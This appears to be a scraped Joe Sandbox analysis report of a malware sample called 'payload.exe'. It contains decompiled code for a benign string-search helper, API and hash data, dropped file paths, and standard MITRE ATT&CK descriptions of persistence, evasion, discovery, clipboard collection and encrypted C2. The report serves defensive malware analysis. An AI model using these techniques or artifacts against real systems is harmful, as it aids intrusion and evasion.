Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004058D1 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058D1(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x004058e1
0x004058e3
0x004058e6
0x00405912
0x004058eb
0x004058f4
0x004058f9
0x00405904
0x00405907
0x00405923
0x00405909
0x00405910
0x00000000
0x00405910
0x0040591c
0x00405920
0x00405920
0x0040591a
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E1
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058F9
CharNextA.USER32(00000000), ref: 0040590A
lstrlenA.KERNEL32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405913

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction ID: 481a9c588bbd1c68550dea5b76d7ebd72626077616c8f786d6c844a28ee3c139
Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction Fuzzy Hash: 9EF0F632504418FFCB02AFA5DC0099EBBA8EF46360B2540B9F800F7310D274EF01ABA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report payload.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration\Custom3.ini

C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration\Eksekutivkomiteers.Ant

C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration\Skemp210.Hav

C:\Users\user\AppData\Local\Temp\Dybfrossen.ini

C:\Users\user\AppData\Local\Temp\nsg90FC.tmp\System.dll

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Windows Analysis Report
payload.exe

Function 004030D9 Relevance: 89.6, APIs: 33, Strings: 18, Instructions: 357
stringcomfileCOMMON

Function 0040488F Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Function 00405D1B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199
stringCOMMON

Function 0040559B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00406344 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00405FFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00403A0B Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Function 00403679 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 004053D8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Function 00406024 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00402E9F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Function 00405859 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46
stringCOMMON

Function 0040599B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 00404E86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Function 0040548A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Function 00406779 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Function 0040697A Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Function 00406690 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Function 00406195 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Function 004065E3 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Function 00406701 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Function 0040664D Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48
synchronizationCOMMON

Function 00405BE0 Relevance: 4.5, APIs: 3, Instructions: 45
registryCOMMON

Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44
registryCOMMON

Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40
registryCOMMON

Function 00406092 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 0040596C Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00405947 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Function 00405455 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 0040255C Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Function 00402616 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Function 00402283 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22
registryCOMMON